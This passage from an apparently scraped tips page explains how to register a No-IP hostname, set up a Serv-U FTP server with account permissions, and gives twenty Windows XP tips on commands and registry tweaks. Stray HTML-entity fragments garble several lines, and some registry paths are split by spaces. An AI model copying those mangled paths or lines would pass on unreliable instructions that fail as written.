4. Check your email mailbox and wait for the mail that contains your password

5. Go back to http://www.no-ip.com/ and type your email address and password to login to your account.

6. Once in your account, click on Add a host in the left menu

7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)

8. Check Allow Wildcards and click the Submit button

9. You now have your static address (example: rkchoolie.serveftp.com)

10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client

11. Once downloaded, install the software and type in your email address and password when asked.

12. Finally tick the checkbox near your static address.

You now have a static web address .

Step 2.

Installing and setting the FTP server

1. Install Serv-U 4.0.

2. Start Serv-U and use the wizard to setup your ftp.

3. Click next until you're asked for an IP address, leave it blank and then click next.

4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.

5. You are asked if you want to allow anonymous access, select No and then click next.

6. You are then asked to create a named account, check yes and then click next.

7. Type in the user name you wish for this account (example: Harrie) and click next.

8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.

9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.

10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.

11. The account is now set so click finish.

Step 3.

Configuring user accounts

1. In the left tree-menu, select the account you've just created and then click on the General tab.

2. Check Hide ‘Hidden’ Files.

3. Check Allow only and enter the number one in the box.

4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.

5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6. Now, click on the Dir Access tab.

7. You should see the home folder in there. Highlight it and make your permissions.

8. If you only want users to be able to download check only Read, List, & Inherit.

9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.

10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.

11. There are many other different sets of permissions you can play with. I just covered your basics.

12. Your server is now set!

13. Try logging on with the username and password and see if it works.

20 Things the average person doesn't know about XP

1.It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2.You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -some may stop your computer behaving as you wish. (Professional Edition only). An alternative is to press SHIFT-DEL.

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe  user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than many ISPs have, so you problably can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system. (Professional Edition only)

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can change things back by typing 'regsvr32 zipfldr.dll'.

9. XP has Clear Type -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable Clear Type, right click on the desktop, select Properties, Appearance, Effects, select clear Type from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use Clear Type on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/ControlPanel/Desk top/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend's real IP address -- they can find this out by going to www.whatismyip.com - and get them to make sure that they've got port   &nb sp;   &nbs p;     ;         & nbsp;   &n bsp;   &nb sp;  3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click  the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Softwar e/Microsoft/Windows/Curre ntVersion/Explorer/Advanc ed and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2',  which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box   &nbs p;     ;         & nbsp;   &n bsp;   &nb sp;   &nbs p;  will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check  the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDel ay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By- Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. Windows XP secretly KNOWS that the average user has no idea what they are doing. Therefore, it doesn't let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you REALLY want to do this). Oh yeah, and internet explorer kinda sucks, get Firefox.
